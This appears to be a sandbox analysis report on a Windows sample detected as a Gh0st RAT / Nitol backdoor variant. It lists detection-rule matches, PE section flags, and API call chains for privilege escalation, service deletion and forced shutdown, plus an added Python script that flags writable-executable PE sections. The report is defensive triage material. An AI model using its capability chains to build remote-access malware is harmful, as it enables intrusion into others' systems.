                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol backdoor | Author: ditekSHen
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol Malware | Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol backdoor | Author: ditekSHen
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol Malware | Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol backdoor | Author: ditekSHen
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol Malware | Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol backdoor | Author: ditekSHen
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol Malware | Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol backdoor | Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol Malware | Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol backdoor | Author: ditekSHen
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol Malware | Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol backdoor | Author: ditekSHen
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol Malware | Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol backdoor | Author: ditekSHen
                Source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTR | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTR | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTR | Matched rule: Identifies a variant of Gh0st Rat | Author: unknown
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
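The static PE row above reports a .text section whose characteristics carry both IMAGE_SCN_MEM_EXECUTE and IMAGE_SCN_MEM_WRITE. A normal linker emits .text as read/execute only; a code section that is also writable is the usual footprint of a packer or of an unpacking stub that rewrites its own code in place, which is why sandboxes score it. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it re-implements that check from the raw section table with the standard library only, so it can be run offline over any file. The minimal PE image it builds for the self-test is constructed here with the same .text flags the report lists; it is not the analysed binary.

```python
"""Flag PE sections that are mapped writable and executable at the same time.

Added example, not part of the Joe Sandbox report. Re-implements the
"writeable .text section" indicator from the raw section table using only
the standard library. The image built by build_sample_pe() is a constructed
stand-in with the .text flags the report lists; it is not the analysed sample.
"""
import struct
import sys

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

FLAG_NAMES = {
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_CNT_INITIALIZED_DATA: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}

COFF_HEADER = "<HHIIIHH"         # Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
SECTION_HEADER = "<8sIIIIIIHHI"  # Name .. Characteristics, 40 bytes per IMAGE_SECTION_HEADER


def parse_sections(data: bytes) -> list[tuple[str, int]]:
    """Return (name, characteristics) for every section header in a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _ = struct.unpack_from(COFF_HEADER, data, coff_off)
    # The section table follows the optional header, whose size is given in the COFF header.
    sec_off = coff_off + struct.calcsize(COFF_HEADER) + opt_size
    sections = []
    for i in range(nsections):
        fields = struct.unpack_from(SECTION_HEADER, data, sec_off + i * struct.calcsize(SECTION_HEADER))
        name = fields[0].rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, fields[-1]))
    return sections


def describe_flags(characteristics: int) -> str:
    """Render the known characteristic bits as the names Joe Sandbox prints."""
    return "|".join(name for bit, name in FLAG_NAMES.items() if characteristics & bit) or "0"


def find_wx_sections(data: bytes) -> list[tuple[str, str]]:
    """Sections with both MEM_EXECUTE and MEM_WRITE set: a packer or self-modifying code hint."""
    wx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    return [(name, describe_flags(ch)) for name, ch in parse_sections(data) if ch & wx == wx]


def build_sample_pe(text_characteristics: int) -> bytes:
    """Constructed minimal PE32 image: DOS header, COFF header, zeroed optional header, two sections."""
    e_lfanew = 0x40
    img = bytearray(b"MZ") + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0  # PE32 optional header size; its contents are not needed for the section table
    img += b"PE\0\0"
    img += struct.pack(COFF_HEADER, 0x014C, 2, 0, 0, 0, opt_size, 0x0102)
    img += b"\0" * opt_size

    def section(name: bytes, characteristics: int) -> bytes:
        return struct.pack(SECTION_HEADER, name, 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0, characteristics)

    img += section(b".text", text_characteristics)
    img += section(b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    return bytes(img)


# The .text flags the report lists for this sample: code, initialized data, execute, read, write.
REPORTED_TEXT_FLAGS = (IMAGE_SCN_CNT_CODE | IMAGE_SCN_CNT_INITIALIZED_DATA
                       | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)


if __name__ == "__main__":
    # Usage: python pe_wx.py [sample.exe]; with no argument the constructed image is audited.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(REPORTED_TEXT_FLAGS)
    for name, flags in find_wx_sections(blob):
        print(f"W+X section {name!r}: {flags}")
```

The check reads only the section table, so it is cheap enough to run over a whole quarantine directory; a hit is a triage signal, not a verdict, since some legitimate runtimes and protectors also ship W+X sections.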
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_025536D9 NtQueryVirtualMemory
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027B27AD NtQueryVirtualMemory
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_10001503: memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0040DED2 OpenSCManagerA,OpenServiceA,DeleteService,GetSystemDirectoryA,lstrcat,DeleteFileA,exit
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_00410FA6 memset,memset,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CreateProcessAsUserA,FreeLibrary
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0040D25D ExitWindowsEx
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0040954F memcpy,CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_10005211 ExitWindowsEx
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_10001503 memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0040D25D ExitWindowsEx
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0040954F memcpy,CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_10005211 ExitWindowsEx
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_10001503 memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | File created: C:\Windows\SysWOW64\Default.key
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_004782B8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0047767F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_10005F59
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A634A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022BA352
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022BE023
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022B8BDF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022BD984
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0247C289
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_025282B6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0254330A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0248C3F0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0254A3BD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0253905D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_02529043
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_024FF003
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_025460D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0254216E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0254B10D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_024AB117
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0254A120
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_025051C9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_02501187
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_024C9190
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0248C197
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0254A677
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0253A663
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_025136EF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_02542680
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_025256AF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0254D745
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0254B741
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_02543763
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_024C0703
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_02556702
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0253F739
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A960B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_022A7CE5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_004782B8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0047767F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_10005F59
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0238E706
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_023A241D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_023934AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_02393B4A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0238FE79
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0237BE71
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_02378ED2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026EE3AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026F172B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026D97DD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026EABA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026EB26B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_02728264
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0276025B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A1242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0276429D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026DB35D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0278B320
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A23DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0278738A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026ED00B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027B5011
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0275E0D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A20B1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027AA0B4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_02798131
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_02788117
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A91F4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0270A1EB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027AA1E1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A51AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0277C66B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026F764B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026AE640
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0272F648
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026AE63D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027AA61C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0276960B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A1754
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A974B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_02799737
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0271F7D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027B57D6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027727C3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_02784783
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A74FE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026EB4C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A9491
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027AA574
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A9546
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_026EC5FD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0275F5AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0272D593
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0278D59B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027AAA51
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A9AAA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0278EA8B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_02798B61
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027AABFC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A1BDC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027A2837
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027AC819
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_027AA815
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0279E80D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0237F132
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0237D80C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: String function: 02290CE6 appears 50 times
